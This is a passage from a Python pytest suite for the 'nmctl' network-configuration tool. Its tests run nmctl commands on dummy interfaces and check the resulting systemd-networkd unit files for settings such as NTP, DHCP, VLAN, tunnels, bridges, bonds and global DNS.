parser.read(os.path.join(networkd_unit_file_path, '10-test99.network'))
assert(parser.get('Match', 'Name') == 'test99')
assert(parser.get('Network', 'Domains') == 'domain2 domain1')
def test_cli_add_ntp(self):
assert(link_exits('test99') == True)
subprocess.check_call(['nmctl', 'set-link-mode', 'test99', 'yes'])
assert(unit_exits('10-test99.network') == True)
subprocess.check_call(['sleep', '5'])
subprocess.check_call(['nmctl', 'add-ntp', 'test99', '192.168.1.34', '192.168.1.45'])
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test99.network'))
assert(parser.get('Match', 'Name') == 'test99')
assert(parser.get('Network', 'NTP') == '192.168.1.45 192.168.1.34')
def test_cli_set_ntp(self):
assert(link_exits('test99') == True)
subprocess.check_call(['nmctl', 'set-link-mode', 'test99', 'yes'])
assert(unit_exits('10-test99.network') == True)
subprocess.check_call(['sleep', '5'])
subprocess.check_call(['nmctl', 'set-ntp', 'test99', '192.168.1.34', '192.168.1.45'])
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test99.network'))
assert(parser.get('Match', 'Name') == 'test99')
assert(parser.get('Network', 'NTP') == '192.168.1.45 192.168.1.34')
def test_cli_set_ip_v6_router_advertisement(self):
assert(link_exits('test99') == True)
subprocess.check_call(['nmctl', 'set-link-mode', 'test99', 'yes'])
assert(unit_exits('10-test99.network') == True)
subprocess.check_call(['sleep', '5'])
subprocess.check_call(['nmctl', 'set-ipv6acceptra', 'test99', 'yes'])
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test99.network'))
assert(parser.get('Match', 'Name') == 'test99')
assert(parser.get('Network', 'IPv6AcceptRA') == 'true')
def test_cli_set_link_local_addressing(self):
assert(link_exits('test99') == True)
subprocess.check_call(['nmctl', 'set-link-mode', 'test99', 'yes'])
assert(unit_exits('10-test99.network') == True)
subprocess.check_call(['nmctl', 'set-link-local-address', 'test99', 'yes'])
subprocess.check_call(['sleep', '5'])
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test99.network'))
assert(parser.get('Match', 'Name') == 'test99')
assert(parser.get('Network', 'LinkLocalAddressing') == 'true')
def test_cli_set_ipv4_link_local_route(self):
assert(link_exits('test99') == True);
subprocess.check_call(['nmctl', 'set-link-mode', 'test99', 'yes'])
assert(unit_exits('10-test99.network') == True)
subprocess.check_call(['sleep', '5'])
subprocess.check_call(['nmctl', 'set-ipv4ll-route', 'test99', 'yes'])
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test99.network'))
assert(parser.get('Match', 'Name') == 'test99')
assert(parser.get('Network', 'IPv4LLRoute') == 'true')
def test_cli_set_llmnr(self):
assert(link_exits('test99') == True);
subprocess.check_call(['nmctl', 'set-link-mode', 'test99', 'yes'])
assert(unit_exits('10-test99.network') == True)
subprocess.check_call(['nmctl', 'set-llmnr', 'test99', 'yes'])
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test99.network'))
assert(parser.get('Match', 'Name') == 'test99')
assert(parser.get('Network', 'LLMNR') == 'true')
def test_cli_set_multicast_dns(self):
assert(link_exits('test99') == True);
subprocess.check_call(['nmctl', 'set-link-mode', 'test99', 'yes'])
assert(unit_exits('10-test99.network') == True)
subprocess.check_call(['sleep', '5'])
subprocess.check_call(['nmctl', 'set-multicast-dns', 'test99', 'yes'])
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test99.network'))
assert(parser.get('Match', 'Name') == 'test99')
assert(parser.get('Network', 'MulticastDNS') == 'true')
def test_cli_set_ip_masquerade(self):
assert(link_exits('test99') == True);
subprocess.check_call(['nmctl', 'set-link-mode', 'test99', 'yes'])
assert(unit_exits('10-test99.network') == True)
subprocess.check_call(['sleep', '5'])
subprocess.check_call(['nmctl', 'set-ipmasquerade', 'test99', 'yes'])
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test99.network'))
assert(parser.get('Match', 'Name') == 'test99')
assert(parser.get('Network', 'IPMasquerade') == 'true')
def test_cli_set_dhcp4_client_identifier(self):
assert(link_exits('test99') == True)
subprocess.check_call(['nmctl', 'set-link-mode', 'test99', 'yes'])
assert(unit_exits('10-test99.network') == True)
subprocess.check_call(['sleep', '5'])
subprocess.check_call(['nmctl', 'set-dhcp4-client-identifier', 'test99', 'mac'])
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test99.network'))
assert(parser.get('Match', 'Name') == 'test99')
assert(parser.get('DHCPv4', 'ClientIdentifier') == 'mac')
def test_cli_set_dhcp4_use_dns(self):
assert(link_exits('test99') == True)
subprocess.check_call(['nmctl', 'set-link-mode', 'test99', 'yes'])
assert(unit_exits('10-test99.network') == True)
subprocess.check_call(['sleep', '5'])
subprocess.check_call(['nmctl', 'set-dhcp4-use-dns', 'test99', 'yes'])
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test99.network'))
assert(parser.get('Match', 'Name') == 'test99')
assert(parser.get('DHCPv4', 'UseDNS') == 'true')
def test_cli_set_dhcp4_use_mtu(self):
assert(link_exits('test99') == True)
subprocess.check_call(['nmctl', 'set-link-mode', 'test99', 'yes'])
assert(unit_exits('10-test99.network') == True)
subprocess.check_call(['sleep', '5'])
subprocess.check_call(['nmctl', 'set-dhcp4-use-mtu', 'test99', 'yes'])
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test99.network'))
assert(parser.get('Match', 'Name') == 'test99')
def test_cli_set_dhcp4_use_domains(self):
assert(link_exits('test99') == True)
subprocess.check_call(['nmctl', 'set-link-mode', 'test99', 'yes'])
assert(unit_exits('10-test99.network') == True)
subprocess.check_call(['sleep', '5'])
subprocess.check_call(['nmctl', 'set-dhcp4-use-domains', 'test99', 'yes'])
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test99.network'))
assert(parser.get('Match', 'Name') == 'test99')
assert(parser.get('DHCPv4', 'UseDomains') == 'true')
def test_cli_set_dhcp4_use_ntp(self):
assert(link_exits('test99') == True)
subprocess.check_call(['nmctl', 'set-link-mode', 'test99', 'yes'])
assert(unit_exits('10-test99.network') == True)
subprocess.check_call(['sleep', '5'])
subprocess.check_call(['nmctl', 'set-dhcp4-use-ntp', 'test99', 'yes'])
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test99.network'))
assert(parser.get('Match', 'Name') == 'test99')
assert(parser.get('DHCPv4', 'UseNTP') == 'true')
def test_cli_set_dhcp4_use_routes(self):
assert(link_exits('test99') == True)
subprocess.check_call(['nmctl', 'set-link-mode', 'test99', 'yes'])
assert(unit_exits('10-test99.network') == True)
subprocess.check_call(['nmctl', 'set-dhcp4-use-routes', 'test99', 'yes'])
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test99.network'))
assert(parser.get('Match', 'Name') == 'test99')
assert(parser.get('DHCPv4', 'UseRoutes') == 'true')
def test_cli_set_link_lldp(self):
assert(link_exits('test99') == True)
subprocess.check_call(['nmctl', 'set-link-mode', 'test99', 'yes'])
assert(unit_exits('10-test99.network') == True)
subprocess.check_call(['sleep', '5'])
subprocess.check_call(['nmctl', 'set-lldp', 'test99', 'yes'])
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test99.network'))
assert(parser.get('Match', 'Name') == 'test99')
assert(parser.get('Network', 'LLDP') == 'true')
def test_cli_set_link_emit_lldp(self):
assert(link_exits('test99') == True)
subprocess.check_call(['nmctl', 'set-link-mode', 'test99', 'yes'])
assert(unit_exits('10-test99.network') == True)
subprocess.check_call(['sleep', '5'])
subprocess.check_call(['nmctl', 'set-emit-lldp', 'test99', 'yes'])
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test99.network'))
assert(parser.get('Match', 'Name') == 'test99')
assert(parser.get('Network', 'EmitLLDP') == 'true')
class TestCLIDHCPv4Server:
def setup_method(self):
link_remove('test99')
link_add_dummy('test99')
restart_networkd()
def teardown_method(self):
remove_units_from_netword_unit_path()
link_remove('test99')
def test_cli_configure_dhcpv4_server(self):
assert(link_exits('test99') == True)
subprocess.check_call(['nmctl', 'set-link-mode', 'test99', 'yes'])
assert(unit_exits('10-test99.network') == True)
subprocess.check_call(['nmctl', 'add-dhcpv4-server', 'test99', 'pool-offset',
'10', 'pool-size', '20', 'default-lease-time', '100',
'max-lease-time', '200', 'emit-dns', 'yes', 'dns', '192.168.1.1',
'emit-router', 'yes'])
subprocess.check_call(['sleep', '3'])
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test99.network'))
assert(parser.get('Match', 'Name') == 'test99')
assert(parser.get('Network', 'DHCPServer') == 'yes')
assert(parser.get('DHCPServer', 'PoolOffset') == '10')
assert(parser.get('DHCPServer', 'PoolSize') == '20')
assert(parser.get('DHCPServer', 'DefaultLeaseTimeSec') == '100')
assert(parser.get('DHCPServer', 'MaxLeaseTimeSec') == '200')
assert(parser.get('DHCPServer', 'EmitDNS') == 'yes')
assert(parser.get('DHCPServer', 'DNS') == '192.168.1.1')
assert(parser.get('DHCPServer', 'EmitRouter') == 'yes')
class TestCLIIPv6RA:
def setup_method(self):
link_remove('test99')
link_add_dummy('test99')
restart_networkd()
def teardown_method(self):
remove_units_from_netword_unit_path()
link_remove('test99')
def test_cli_configure_ipv6ra(self):
assert(link_exits('test99') == True)
subprocess.check_call(['nmctl', 'set-link-mode', 'test99', 'yes'])
assert(unit_exits('10-test99.network') == True)
subprocess.check_call(['nmctl', 'add-ipv6ra', 'test99', 'prefix', '2002:da8:1:0::/64',
'pref-lifetime', '100', 'valid-lifetime', '200', 'assign', 'yes',
'managed', 'yes', 'emit-dns', 'yes', 'dns', '2002:da8:1:0::1',
'domain', 'test.com', 'emit-domain', 'yes', 'dns-lifetime', '100', 'router-pref', 'medium',
'route-prefix', '2001:db1:fff::/64', 'route-lifetime', '1000'])
subprocess.check_call(['sleep', '3'])
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test99.network'))
assert(parser.get('Match', 'Name') == 'test99')
assert(parser.get('Network', 'IPv6SendRA') == 'yes')
assert(parser.get('IPv6Prefix', 'Prefix') == '2002:da8:1::/64')
assert(parser.get('IPv6Prefix', 'PreferredLifetimeSec') == '100')
assert(parser.get('IPv6Prefix', 'ValidLifetimeSec') == '200')
assert(parser.get('IPv6SendRA', 'RouterPreference') == 'medium')
assert(parser.get('IPv6SendRA', 'DNS') == '2002:da8:1::1')
assert(parser.get('IPv6SendRA', 'EmitDNS') == 'yes')
assert(parser.get('IPv6SendRA', 'Assign') == 'yes')
assert(parser.get('IPv6SendRA', 'DNSLifetimeSec') == '100')
assert(parser.get('IPv6SendRA', 'Domains') == 'test.com')
assert(parser.get('IPv6RoutePrefix', 'LifetimeSec') == '1000')
assert(parser.get('IPv6RoutePrefix', 'Route') == '2001:db1:fff::/64')
class TestCLINetDev:
def setup_method(self):
link_remove('test98')
link_add_dummy('test98')
restart_networkd()
def teardown_method(self):
remove_units_from_netword_unit_path()
link_remove('test98')
def test_cli_create_vlan(self):
assert(link_exits('test98') == True)
subprocess.check_call(['nmctl', 'create-vlan', 'vlan-98', 'dev', 'test98', 'id', '11'])
assert(unit_exits('10-test98.network') == True)
assert(unit_exits('10-vlan-98.netdev') == True)
assert(unit_exits('10-vlan-98.network') == True)
restart_networkd()
subprocess.check_call(['sleep', '15'])
assert(link_exits('vlan-98') == True)
vlan_parser = configparser.ConfigParser()
vlan_parser.read(os.path.join(networkd_unit_file_path, '10-vlan-98.netdev'))
assert(vlan_parser.get('NetDev', 'Name') == 'vlan-98')
assert(vlan_parser.get('NetDev', 'kind') == 'vlan')
assert(vlan_parser.get('VLAN', 'id') == '11')
vlan_network_parser = configparser.ConfigParser()
vlan_network_parser.read(os.path.join(networkd_unit_file_path, '10-vlan-98.network'))
assert(vlan_network_parser.get('Match', 'Name') == 'vlan-98')
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test98.network'))
assert(parser.get('Match', 'Name') == 'test98')
assert(parser.get('Network', 'VLAN') == 'vlan-98')
link_remove('vlan-98')
def test_cli_create_macvlan(self):
assert(link_exits('test98') == True)
subprocess.check_call(['nmctl', 'create-macvlan', 'macvlan-98', 'dev', 'test98', 'mode', 'private'])
assert(unit_exits('10-macvlan-98.netdev') == True)
assert(unit_exits('10-macvlan-98.network') == True)
assert(unit_exits('10-test98.network') == True)
restart_networkd()
subprocess.check_call(['sleep', '3'])
assert(link_exits('macvlan-98') == True)
macvlan_parser = configparser.ConfigParser()
macvlan_parser.read(os.path.join(networkd_unit_file_path, '10-macvlan-98.netdev'))
assert(macvlan_parser.get('NetDev', 'Name') == 'macvlan-98')
assert(macvlan_parser.get('NetDev', 'kind') == 'macvlan')
assert(macvlan_parser.get('MACVLAN', 'Mode') == 'private')
macvlan_network_parser = configparser.ConfigParser()
macvlan_network_parser.read(os.path.join(networkd_unit_file_path, '10-macvlan-98.network'))
assert(macvlan_network_parser.get('Match', 'Name') == 'macvlan-98')
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test98.network'))
assert(parser.get('Match', 'Name') == 'test98')
assert(parser.get('Network', 'MACVLAN') == 'macvlan-98')
link_remove('macvlan-98')
def test_cli_create_macvtap(self):
assert(link_exits('test98') == True)
subprocess.check_call(['nmctl', 'create-macvtap', 'macvtap-98', 'dev', 'test98', 'mode', 'private'])
assert(unit_exits('10-macvtap-98.netdev') == True)
assert(unit_exits('10-macvtap-98.network') == True)
assert(unit_exits('10-test98.network') == True)
restart_networkd()
subprocess.check_call(['sleep', '3'])
assert(link_exits('macvtap-98') == True)
macvlan_parser = configparser.ConfigParser()
macvlan_parser.read(os.path.join(networkd_unit_file_path, '10-macvtap-98.netdev'))
assert(macvlan_parser.get('NetDev', 'Name') == 'macvtap-98')
assert(macvlan_parser.get('NetDev', 'kind') == 'macvtap')
assert(macvlan_parser.get('MACVTAP', 'Mode') == 'private')
macvlan_network_parser = configparser.ConfigParser()
macvlan_network_parser.read(os.path.join(networkd_unit_file_path, '10-macvtap-98.network'))
assert(macvlan_network_parser.get('Match', 'Name') == 'macvtap-98')
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test98.network'))
assert(parser.get('Match', 'Name') == 'test98')
assert(parser.get('Network', 'MACVTAP') == 'macvtap-98')
link_remove('macvtap-98')
def test_cli_create_ipvlan(self):
assert(link_exits('test98') == True)
subprocess.check_call(['nmctl', 'create-ipvlan', 'ipvlan-98', 'dev', 'test98', 'mode', 'l2'])
assert(unit_exits('10-ipvlan-98.netdev') == True)
assert(unit_exits('10-ipvlan-98.network') == True)
assert(unit_exits('10-test98.network') == True)
restart_networkd()
subprocess.check_call(['sleep', '3'])
assert(link_exits('ipvlan-98') == True)
ipvlan_parser = configparser.ConfigParser()
ipvlan_parser.read(os.path.join(networkd_unit_file_path, '10-ipvlan-98.netdev'))
assert(ipvlan_parser.get('NetDev', 'Name') == 'ipvlan-98')
assert(ipvlan_parser.get('NetDev', 'kind') == 'ipvlan')
assert(ipvlan_parser.get('IPVLAN', 'Mode') == 'L2')
ipvlan_network_parser = configparser.ConfigParser()
ipvlan_network_parser.read(os.path.join(networkd_unit_file_path, '10-ipvlan-98.network'))
assert(ipvlan_network_parser.get('Match', 'Name') == 'ipvlan-98')
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test98.network'))
assert(parser.get('Match', 'Name') == 'test98')
assert(parser.get('Network', 'IPVLAN') == 'ipvlan-98')
link_remove('ipvlan-98')
def test_cli_create_ipvtap(self):
assert(link_exits('test98') == True)
subprocess.check_call(['nmctl', 'create-ipvtap', 'ipvtap-98', 'dev', 'test98', 'mode', 'l2'])
assert(unit_exits('10-ipvtap-98.netdev') == True)
assert(unit_exits('10-ipvtap-98.network') == True)
assert(unit_exits('10-test98.network') == True)
restart_networkd()
subprocess.check_call(['sleep', '3'])
assert(link_exits('ipvtap-98') == True)
ipvtap_parser = configparser.ConfigParser()
ipvtap_parser.read(os.path.join(networkd_unit_file_path, '10-ipvtap-98.netdev'))
assert(ipvtap_parser.get('NetDev', 'Name') == 'ipvtap-98')
assert(ipvtap_parser.get('NetDev', 'kind') == 'ipvtap')
assert(ipvtap_parser.get('IPVTAP', 'Mode') == 'L2')
ipvtap_network_parser = configparser.ConfigParser()
ipvtap_network_parser.read(os.path.join(networkd_unit_file_path, '10-ipvtap-98.network'))
assert(ipvtap_network_parser.get('Match', 'Name') == 'ipvtap-98')
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test98.network'))
assert(parser.get('Match', 'Name') == 'test98')
assert(parser.get('Network', 'IPVTAP') == 'ipvtap-98')
link_remove('ipvtap-98')
@pytest.mark.skip(reason="skipping")
def test_cli_create_vrf(self):
subprocess.check_call(['nmctl', 'create-vrf', 'vrf-98', 'table', '11'])
assert(unit_exits('10-vrf-98.netdev') == True)
assert(unit_exits('10-vrf-98.network') == True)
restart_networkd()
subprocess.check_call(['sleep', '3'])
assert(link_exits('vrf-98') == True)
vrf_parser = configparser.ConfigParser()
vrf_parser.read(os.path.join(networkd_unit_file_path, '10-vrf-98.netdev'))
assert(vrf_parser.get('NetDev', 'Name') == 'vrf-98')
assert(vrf_parser.get('NetDev', 'kind') == 'vrf')
assert(vrf_parser.get('VRF', 'Table') == '11')
vrf_network_parser = configparser.ConfigParser()
vrf_network_parser.read(os.path.join(networkd_unit_file_path, '10-vrf-98.network'))
assert(vrf_network_parser.get('Match', 'Name') == 'vrf-98')
link_remove('vrf-98')
def test_cli_create_veth(self):
subprocess.check_call(['nmctl', 'create-veth', 'veth-98', 'peer', 'veth-99'])
assert(unit_exits('10-veth-98.netdev') == True)
assert(unit_exits('10-veth-98.network') == True)
restart_networkd()
subprocess.check_call(['sleep', '3'])
assert(link_exits('veth-98') == True)
assert(link_exits('veth-99') == True)
vrf_parser = configparser.ConfigParser()
vrf_parser.read(os.path.join(networkd_unit_file_path, '10-veth-98.netdev'))
assert(vrf_parser.get('NetDev', 'Name') == 'veth-98')
assert(vrf_parser.get('NetDev', 'kind') == 'veth')
assert(vrf_parser.get('Peer', 'Name') == 'veth-99')
vrf_network_parser = configparser.ConfigParser()
vrf_network_parser.read(os.path.join(networkd_unit_file_path, '10-veth-98.network'))
assert(vrf_network_parser.get('Match', 'Name') == 'veth-98')
link_remove('veth-98')
def test_cli_create_ipip(self):
assert(link_exits('test98') == True)
subprocess.check_call(['nmctl', 'create-ipip', 'ipip-98', 'dev', 'test98', 'local', '192.168.1.2', 'remote', '192.168.1.3'])
assert(unit_exits('10-ipip-98.netdev') == True)
assert(unit_exits('10-ipip-98.network') == True)
assert(unit_exits('10-test98.network') == True)
restart_networkd()
subprocess.check_call(['sleep', '3'])
assert(link_exits('ipip-98') == True)
ipip_parser = configparser.ConfigParser()
ipip_parser.read(os.path.join(networkd_unit_file_path, '10-ipip-98.netdev'))
assert(ipip_parser.get('NetDev', 'Name') == 'ipip-98')
assert(ipip_parser.get('NetDev', 'kind') == 'ipip')
assert(ipip_parser.get('Tunnel', 'Local') == '192.168.1.2')
assert(ipip_parser.get('Tunnel', 'Remote') == '192.168.1.3')
ipip_network_parser = configparser.ConfigParser()
ipip_network_parser.read(os.path.join(networkd_unit_file_path, '10-ipip-98.network'))
assert(ipip_network_parser.get('Match', 'Name') == 'ipip-98')
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test98.network'))
assert(parser.get('Match', 'Name') == 'test98')
assert(parser.get('Network', 'Tunnel') == 'ipip-98')
link_remove('ipip-98')
def test_cli_create_gre(self):
assert(link_exits('test98') == True)
subprocess.check_call(['nmctl', 'create-gre', 'gre-98', 'dev', 'test98', 'local', '192.168.1.2', 'remote', '192.168.1.3'])
assert(unit_exits('10-gre-98.netdev') == True)
assert(unit_exits('10-gre-98.network') == True)
assert(unit_exits('10-test98.network') == True)
restart_networkd()
subprocess.check_call(['sleep', '3'])
assert(link_exits('gre-98') == True)
gre_parser = configparser.ConfigParser()
gre_parser.read(os.path.join(networkd_unit_file_path, '10-gre-98.netdev'))
assert(gre_parser.get('NetDev', 'Name') == 'gre-98')
assert(gre_parser.get('NetDev', 'kind') == 'gre')
assert(gre_parser.get('Tunnel', 'Local') == '192.168.1.2')
assert(gre_parser.get('Tunnel', 'Remote') == '192.168.1.3')
gre_network_parser = configparser.ConfigParser()
gre_network_parser.read(os.path.join(networkd_unit_file_path, '10-gre-98.network'))
assert(gre_network_parser.get('Match', 'Name') == 'gre-98')
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test98.network'))
assert(parser.get('Match', 'Name') == 'test98')
assert(parser.get('Network', 'Tunnel') == 'gre-98')
link_remove('gre-98')
def test_cli_create_gre(self):
assert(link_exits('test98') == True)
subprocess.check_call(['nmctl', 'create-gre', 'gre-98', 'dev', 'test98', 'local', '192.168.1.2', 'remote', '192.168.1.3'])
assert(unit_exits('10-gre-98.netdev') == True)
assert(unit_exits('10-gre-98.network') == True)
assert(unit_exits('10-test98.network') == True)
restart_networkd()
subprocess.check_call(['sleep', '3'])
assert(link_exits('gre-98') == True)
gre_parser = configparser.ConfigParser()
gre_parser.read(os.path.join(networkd_unit_file_path, '10-gre-98.netdev'))
assert(gre_parser.get('NetDev', 'Name') == 'gre-98')
assert(gre_parser.get('NetDev', 'kind') == 'gre')
assert(gre_parser.get('Tunnel', 'Local') == '192.168.1.2')
assert(gre_parser.get('Tunnel', 'Remote') == '192.168.1.3')
gre_network_parser = configparser.ConfigParser()
gre_network_parser.read(os.path.join(networkd_unit_file_path, '10-gre-98.network'))
assert(gre_network_parser.get('Match', 'Name') == 'gre-98')
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test98.network'))
assert(parser.get('Match', 'Name') == 'test98')
assert(parser.get('Network', 'Tunnel') == 'gre-98')
link_remove('gre-98')
def test_cli_create_vti(self):
assert(link_exits('test98') == True)
subprocess.check_call(['nmctl', 'create-vti', 'vti-98', 'dev', 'test98', 'local', '192.168.1.2', 'remote', '192.168.1.3'])
assert(unit_exits('10-vti-98.netdev') == True)
assert(unit_exits('10-vti-98.network') == True)
assert(unit_exits('10-test98.network') == True)
restart_networkd()
subprocess.check_call(['sleep', '3'])
assert(link_exits('vti-98') == True)
vti_parser = configparser.ConfigParser()
vti_parser.read(os.path.join(networkd_unit_file_path, '10-vti-98.netdev'))
assert(vti_parser.get('NetDev', 'Name') == 'vti-98')
assert(vti_parser.get('NetDev', 'kind') == 'vti')
assert(vti_parser.get('Tunnel', 'Local') == '192.168.1.2')
assert(vti_parser.get('Tunnel', 'Remote') == '192.168.1.3')
vti_network_parser = configparser.ConfigParser()
vti_network_parser.read(os.path.join(networkd_unit_file_path, '10-vti-98.network'))
assert(vti_network_parser.get('Match', 'Name') == 'vti-98')
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test98.network'))
assert(parser.get('Match', 'Name') == 'test98')
assert(parser.get('Network', 'Tunnel') == 'vti-98')
link_remove('vti-98')
@pytest.mark.skip(reason="skipping")
def test_cli_create_wireguard(self):
subprocess.check_call(['nmctl', 'create-wg', 'wg99', 'private-key', 'EEGlnEPYJV//kbvvIqxKkQwOiS+UENyPncC4bF46ong=', 'listen-port', '32', 'public-key', 'RDf+LSpeEre7YEIKaxg+wbpsNV7du+ktR99uBEtIiCA', 'endpoint', '192.168.3.56:2000', 'allowed-ips', '192.168.1.2'])
assert(unit_exits('10-wg99.netdev') == True)
assert(unit_exits('10-wg99.network') == True)
restart_networkd()
subprocess.check_call(['sleep', '15'])
assert(link_exits('wg99') == True)
wg_parser = configparser.ConfigParser()
wg_parser.read(os.path.join(networkd_unit_file_path, '10-wg99.netdev'))
assert(wg_parser.get('NetDev', 'Name') == 'wg99')
assert(wg_parser.get('NetDev', 'kind') == 'wireguard')
assert(wg_parser.get('WireGuard', 'PrivateKey') == 'EEGlnEPYJV//kbvvIqxKkQwOiS+UENyPncC4bF46ong=')
assert(wg_parser.get('WireGuard', 'ListenPort') == '32')
assert(wg_parser.get('WireGuardPeer', 'PublicKey') == 'RDf+LSpeEre7YEIKaxg+wbpsNV7du+ktR99uBEtIiCA')
assert(wg_parser.get('WireGuardPeer', 'Endpoint') == '192.168.3.56:2000')
assert(wg_parser.get('WireGuardPeer', 'AllowedIPs') == '192.168.1.2')
network_parser = configparser.ConfigParser()
network_parser.read(os.path.join(networkd_unit_file_path, '10-wg99.network'))
assert(network_parser.get('Match', 'Name') == 'wg99')
link_remove('wg99')
def test_cli_create_vxlan(self):
assert(link_exits('test98') == True)
subprocess.check_call(['nmctl', 'create-vxlan', 'vxlan-98', 'dev', 'test98', 'vni', '32', 'local', '192.168.1.2', 'remote', '192.168.1.3', 'port', '7777'])
assert(unit_exits('10-test98.network') == True)
assert(unit_exits('10-vxlan-98.network') == True)
assert(unit_exits('10-vxlan-98.netdev') == True)
restart_networkd()
subprocess.check_call(['sleep', '15'])
assert(link_exits('vxlan-98') == True)
vxlan_parser = configparser.ConfigParser()
vxlan_parser.read(os.path.join(networkd_unit_file_path, '10-vxlan-98.netdev'))
assert(vxlan_parser.get('NetDev', 'Name') == 'vxlan-98')
assert(vxlan_parser.get('NetDev', 'kind') == 'vxlan')
assert(vxlan_parser.get('VXLAN', 'VNI') == '32')
assert(vxlan_parser.get('VXLAN', 'Local') == '192.168.1.2')
assert(vxlan_parser.get('VXLAN', 'Remote') == '192.168.1.3')
assert(vxlan_parser.get('VXLAN', 'DestinationPort') == '7777')
vxlan_network_parser = configparser.ConfigParser()
vxlan_network_parser.read(os.path.join(networkd_unit_file_path, '10-vxlan-98.network'))
assert(vxlan_network_parser.get('Match', 'Name') == 'vxlan-98')
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test98.network'))
assert(parser.get('Match', 'Name') == 'test98')
assert(parser.get('Network', 'VXLAN') == 'vxlan-98')
link_remove('vxlan-98')
def test_cli_create_bridge(self):
link_add_dummy('test-99')
assert(link_exits('test98') == True)
assert(link_exits('test-99') == True)
subprocess.check_call(['nmctl', 'create-bridge', 'bridge-98', 'test98', 'test-99'])
assert(unit_exits('10-test98.network') == True)
assert(unit_exits('10-test-99.network') == True)
assert(unit_exits('10-bridge-98.network') == True)
assert(unit_exits('10-bridge-98.netdev') == True)
subprocess.check_call(['sleep', '3'])
assert(link_exits('bridge-98') == True)
bridge_parser = configparser.ConfigParser()
bridge_parser.read(os.path.join(networkd_unit_file_path, '10-bridge-98.netdev'))
assert(bridge_parser.get('NetDev', 'Name') == 'bridge-98')
assert(bridge_parser.get('NetDev', 'kind') == 'bridge')
bridge_network_parser = configparser.ConfigParser()
bridge_network_parser.read(os.path.join(networkd_unit_file_path, '10-bridge-98.network'))
assert(bridge_network_parser.get('Match', 'Name') == 'bridge-98')
test98_parser = configparser.ConfigParser()
test98_parser.read(os.path.join(networkd_unit_file_path, '10-test98.network'))
assert(test98_parser.get('Match', 'Name') == 'test98')
assert(test98_parser.get('Network', 'Bridge') == 'bridge-98')
test99_parser = configparser.ConfigParser()
test99_parser.read(os.path.join(networkd_unit_file_path, '10-test-99.network'))
assert(test99_parser.get('Match', 'Name') == 'test-99')
assert(test99_parser.get('Network', 'Bridge') == 'bridge-98')
link_remove('bridge-98')
link_remove('test-99')
def test_cli_create_bond(self):
link_add_dummy('test-99')
assert(link_exits('test98') == True)
assert(link_exits('test-99') == True)
subprocess.check_call(['nmctl', 'create-bond', 'bond-98', 'mode', 'balance-rr', 'test98', 'test-99'])
assert(unit_exits('10-test98.network') == True)
assert(unit_exits('10-test-99.network') == True)
assert(unit_exits('10-bond-98.network') == True)
assert(unit_exits('10-bond-98.netdev') == True)
subprocess.check_call(['sleep', '3'])
assert(link_exits('bond-98') == True)
bond_parser = configparser.ConfigParser()
bond_parser.read(os.path.join(networkd_unit_file_path, '10-bond-98.netdev'))
assert(bond_parser.get('NetDev', 'Name') == 'bond-98')
assert(bond_parser.get('NetDev', 'kind') == 'bond')
assert(bond_parser.get('Bond', 'Mode') == 'balance-rr')
bond_network_parser = configparser.ConfigParser()
bond_network_parser.read(os.path.join(networkd_unit_file_path, '10-bond-98.network'))
assert(bond_network_parser.get('Match', 'Name') == 'bond-98')
test98_parser = configparser.ConfigParser()
test98_parser.read(os.path.join(networkd_unit_file_path, '10-test98.network'))
assert(test98_parser.get('Match', 'Name') == 'test98')
assert(test98_parser.get('Network', 'Bond') == 'bond-98')
test99_parser = configparser.ConfigParser()
test99_parser.read(os.path.join(networkd_unit_file_path, '10-test-99.network'))
assert(test99_parser.get('Match', 'Name') == 'test-99')
assert(test99_parser.get('Network', 'Bond') == 'bond-98')
link_remove('bond-98')
link_remove('test-99')
class TestCLIGlobalDNSDomain:
def test_cli_configure_global_dns_server(self):
subprocess.check_call(['nmctl', 'add-dns', 'global', '8.8.4.4', '8.8.8.8', '8.8.8.1', '8.8.8.2'])
subprocess.check_call(['sleep', '3'])
parser = configparser.ConfigParser()
parser.read('/etc/systemd/resolved.conf')
assert(parser.get('Resolve', 'DNS') == '8.8.4.4 8.8.8.1 8.8.8.2 8.8.8.8')
def test_cli_configure_global_domain_server(self):
subprocess.check_call(['nmctl', 'add-domain', 'global', 'test1', 'test2'])
subprocess.check_call(['sleep', '3'])
parser = configparser.ConfigParser()
parser.read('/etc/systemd/resolved.conf')
assert(parser.get('Resolve', 'Domains') == 'test1 test2')
class TestCLINetworkProxy:
def test_cli_configure_network_proxy(self):
